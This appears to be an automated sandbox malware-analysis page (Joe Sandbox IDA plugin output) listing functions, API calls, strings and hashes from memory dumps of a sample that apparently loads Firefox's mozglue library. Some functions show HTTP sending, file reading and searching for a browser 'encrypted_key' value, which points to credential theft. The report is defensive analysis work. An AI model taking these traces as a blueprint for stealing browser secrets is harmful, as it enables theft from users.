ERROR, xrefs: 00AC530A
ERROR, xrefs: 00AC54A9
ERROR, xrefs: 00AC546F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: da0642ce454a4e01ef1cb48b492ded40f73385c5f494cfb828767ccbbc78ea31
Instruction ID: ef354c285739894a10c2eb8a95205a9127436bc40bdfcea06e524a4d338a9a50
Opcode Fuzzy Hash: da0642ce454a4e01ef1cb48b492ded40f73385c5f494cfb828767ccbbc78ea31
Instruction Fuzzy Hash: 2A51B67091014CABCB18FF64CA96FFD7779AF60344F514018F40AAA592EF346B46CBA2

Function 6CAD3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CAD3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CAD34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CAD34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CAD350E
__Init_thread_footer.LIBCMT ref: 6CAD3522
__aulldiv.LIBCMT ref: 6CAD3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CAD357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CAD3592

Part of subcall function 6CB0AB89: EnterCriticalSection.KERNEL32(6CB5E370,?,?,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284), ref: 6CB0AB94
Part of subcall function 6CB0AB89: LeaveCriticalSection.KERNEL32(6CB5E370,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CB0ABD1

Strings

kernel32.dll, xrefs: 6CAD34EA
GetSystemTimePreciseAsFileTime, xrefs: 6CAD3508

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 0941a0edf8be6238785d249d8989bcd8690e945505a987bf649a4a67c75d096d
Instruction ID: 579b1f4cf63e55a9e2683b9c0d23ac71e849e1531cf9507a2ca42a56cac6f939
Opcode Fuzzy Hash: 0941a0edf8be6238785d249d8989bcd8690e945505a987bf649a4a67c75d096d
Instruction Fuzzy Hash: DC31E275B01249AFDF04DFB9C858AAEB7B9FB45304F950419E541E3690DB70A944CF60

Function 6CAD4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6CB14843,?), ref: 6CAD45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6CB14843,?), ref: 6CAD468A
free.MOZGLUE(?,?,?,?,?,?,6CB14843,?), ref: 6CAD46C9
free.MOZGLUE(?), ref: 6CAD46EF
free.MOZGLUE(?), ref: 6CAD4712
free.MOZGLUE(?), ref: 6CAD4735
free.MOZGLUE(?), ref: 6CAD4758
free.MOZGLUE(?), ref: 6CAD477B
free.MOZGLUE(?), ref: 6CAD479E

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: df0e6eb0b3d7cae533daee4d3393ca6164037314bbbbbb78d63a284adca607d4
Instruction ID: 7e0222777137dc3be3871d8c5b79993f9f0621ba9e9e75ffe3d4b7ec3544dcfc
Opcode Fuzzy Hash: df0e6eb0b3d7cae533daee4d3393ca6164037314bbbbbb78d63a284adca607d4
Instruction Fuzzy Hash: 9BB1F471A041508FDB18CF3CD9947AD77B2AF42328F1A4679E426DBB86D731E8C48B81

Function 00AC12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 42e7370a9f7161b14c14fbd27ca8f7e2703a10e703d797d9360dde6f0bb748d5
Instruction ID: 2832191ed5481a4d6e23d20ee1f11e6a05c2fdd7f94f011c63b1d32735cba84f
Opcode Fuzzy Hash: 42e7370a9f7161b14c14fbd27ca8f7e2703a10e703d797d9360dde6f0bb748d5
Instruction Fuzzy Hash: 6AC193B5A0021D9BCB14EF60DD89FEE7378BB64304F01459CF50AA7241EA74EA85CF92

Function 00AC4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

lstrcat.KERNEL32(?,00000000), ref: 00AC42EC
lstrcat.KERNEL32(?,005EF630), ref: 00AC430B
lstrcat.KERNEL32(?,?), ref: 00AC431F
lstrcat.KERNEL32(?,005EDF08), ref: 00AC4333

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00AC8D90: GetFileAttributesA.KERNEL32(00000000,?,00AB1B54,?,?,00AD564C,?,?,00AD0E1F), ref: 00AC8D9F

Part of subcall function 00AB9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00AB9D39

Part of subcall function 00AB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AB99EC
Part of subcall function 00AB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AB9A11
Part of subcall function 00AB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AB9A31
Part of subcall function 00AB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AB148F,00000000), ref: 00AB9A5A
Part of subcall function 00AB99C0: LocalFree.KERNEL32(00AB148F), ref: 00AB9A90
Part of subcall function 00AB99C0: CloseHandle.KERNEL32(000000FF), ref: 00AB9A9A

Part of subcall function 00AC93C0: GlobalAlloc.KERNEL32(00000000,00AC43DD,00AC43DD), ref: 00AC93D3

StrStrA.SHLWAPI(?,005EF750), ref: 00AC43F3
GlobalFree.KERNEL32(?), ref: 00AC4512

Part of subcall function 00AB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AB4EEE,00000000,00000000), ref: 00AB9AEF
Part of subcall function 00AB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00AB4EEE,00000000,?), ref: 00AB9B01
Part of subcall function 00AB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AB4EEE,00000000,00000000), ref: 00AB9B2A
Part of subcall function 00AB9AC0: LocalFree.KERNEL32(?,?,?,?,00AB4EEE,00000000,?), ref: 00AB9B3F

lstrcat.KERNEL32(?,00000000), ref: 00AC44A3
StrCmpCA.SHLWAPI(?,00AD08D1), ref: 00AC44C0
lstrcat.KERNEL32(00000000,00000000), ref: 00AC44D2
lstrcat.KERNEL32(00000000,?), ref: 00AC44E5
lstrcat.KERNEL32(00000000,00AD0FB8), ref: 00AC44F4

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: e2b80520ac0b94b97e60a52f08a99b308ddcf0fad9b6debc855c421a205f7397
Instruction ID: 87f7a19a49c3e961103131a3c23b40e87c90bea3dadfba4dc654001960ac079a
Opcode Fuzzy Hash: e2b80520ac0b94b97e60a52f08a99b308ddcf0fad9b6debc855c421a205f7397
Instruction Fuzzy Hash: 217156B6900208ABDB14EBA0DD99FEE777DBB48304F00459CF60997181EA75DB45CFA2

Function 6CB3AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6CB3AC52
CreateFileMappingW.KERNEL32 ref: 6CB3AC7D
GetSystemInfo.KERNEL32 ref: 6CB3AC98
MapViewOfFile.KERNEL32 ref: 6CB3ACB0
GetSystemInfo.KERNEL32 ref: 6CB3ACCD
MapViewOfFile.KERNEL32 ref: 6CB3AD05
UnmapViewOfFile.KERNEL32 ref: 6CB3AD1C
CloseHandle.KERNEL32 ref: 6CB3AD28
UnmapViewOfFile.KERNEL32 ref: 6CB3AD37
CloseHandle.KERNEL32 ref: 6CB3AD43
CloseHandle.KERNEL32 ref: 6CB3AD67

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: c71aca881e8396b9441b6e345b31bd0d468868600f808c660f6c3e829532f497
Instruction ID: 9e47401f06a91691ac265a0253b3c9878ef407e89e2653ae62f6b094a935bb25
Opcode Fuzzy Hash: c71aca881e8396b9441b6e345b31bd0d468868600f808c660f6c3e829532f497
Instruction Fuzzy Hash: 0D314FB1A047448FDB01EFB8D64866EBBF0FF85305F558A2DE98997251EB709448CB82

Function 6CB2DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CB2DDCF

Part of subcall function 6CB0FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB0FA4B

Part of subcall function 6CB290E0: free.MOZGLUE(?,00000000,?,?,6CB2DEDB), ref: 6CB290FF
Part of subcall function 6CB290E0: free.MOZGLUE(?,00000000,?,?,6CB2DEDB), ref: 6CB29108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB2DE0D
free.MOZGLUE(00000000), ref: 6CB2DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB2DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB2DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CB2DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CB1DEFD,?,6CAE4A68), ref: 6CB2DF32

Part of subcall function 6CB2DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CB2DB86
Part of subcall function 6CB2DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CB2DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CB1DEFD,?,6CAE4A68), ref: 6CB2DF65
free.MOZGLUE(?), ref: 6CB2DF80

Part of subcall function 6CAF5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAF5EDB
Part of subcall function 6CAF5E90: memset.VCRUNTIME140(6CB37765,000000E5,55CCCCCC), ref: 6CAF5F27
Part of subcall function 6CAF5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAF5FB2

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: c64227e0bb29f3ca4525fd0e72b8610b0b29f6a7498aa74f2c64c202aa30cc1c
Instruction ID: de050b97d9174261db0316e903cf68c6a3c07ce36712a9169c0dcf7f1b14d52c
Opcode Fuzzy Hash: c64227e0bb29f3ca4525fd0e72b8610b0b29f6a7498aa74f2c64c202aa30cc1c
Instruction Fuzzy Hash: 0351A6726016409BDB219F38E8806BEB376FF95318F95051CD85E53B00D739F95ACB92

Function 6CB0CC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CAD31A7), ref: 6CB0CDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6CB0CFA4, 6CB0CFB8
<jemalloc>, xrefs: 6CB0CF9F, 6CB0CFB3

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: cca4e069328eb0639c6f3f0a03d8e369c9aa93da98abe63dfcaf1c1c85d1679d
Instruction ID: 216a60c3df00ea49e62d8ad0688802e782fbc1d520f2941371a0464277411044
Opcode Fuzzy Hash: cca4e069328eb0639c6f3f0a03d8e369c9aa93da98abe63dfcaf1c1c85d1679d
Instruction Fuzzy Hash: 9031B031B402855BEF10AFA98C45BAE7F75EF41B58F744018F610ABA80DB71E8048BB3

Function 6CADECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6CADF100: LoadLibraryW.KERNEL32(shell32,?,6CB4D020), ref: 6CADF122
Part of subcall function 6CADF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CADF132

moz_xmalloc.MOZGLUE(00000012), ref: 6CADED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CADEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CADEDCC
CreateFileW.KERNEL32 ref: 6CADEE08
free.MOZGLUE(00000000), ref: 6CADEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CADEE32

Part of subcall function 6CADEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CADEBB5
Part of subcall function 6CADEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CB0D7F3), ref: 6CADEBC3
Part of subcall function 6CADEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CB0D7F3), ref: 6CADEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6CADEDC1

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: f1e855f9e969f9a0f1717e807e97708d944338a6e17d92d3357e3b94d0b63ffa
Instruction ID: 78e07247c7a9f64ec29c32f76c987d2c68eeb66b1c4c30c7aa53f86745f40b2d
Opcode Fuzzy Hash: f1e855f9e969f9a0f1717e807e97708d944338a6e17d92d3357e3b94d0b63ffa
Instruction Fuzzy Hash: 8051D271D053459BDB00DF68C9406EEF7B1AF49318F49852DE8956B740EB34B988C7E2

Function 6CB4A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CB4A565

Part of subcall function 6CB4A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB4A4BE
Part of subcall function 6CB4A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB4A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CB4A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CB4A6B6

Strings

z, xrefs: 6CB4A6AE
0, xrefs: 6CB4A5FB

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: fa3d2a1fbba98c69ce423640dc94862bd84eea15ea7750a8e3d233e8b1fdc34f
Instruction ID: 9c9204102bd78458acbabac19bc1041a4da10eb5afeb1352eea262e2e1225a54
Opcode Fuzzy Hash: fa3d2a1fbba98c69ce423640dc94862bd84eea15ea7750a8e3d233e8b1fdc34f
Instruction Fuzzy Hash: BF4126719087859FC341DF28C080A8FBBE5FF89354F408A2EE49987654EB30E549DB83

Function 6CB19420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6CB0AB89: EnterCriticalSection.KERNEL32(6CB5E370,?,?,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284), ref: 6CB0AB94
Part of subcall function 6CB0AB89: LeaveCriticalSection.KERNEL32(6CB5E370,?,6CAD34DE,6CB5F6CC,?,?,?,?,?,?,?,6CAD3284,?,?,6CAF56F6), ref: 6CB0ABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAE4A68), ref: 6CB1945E
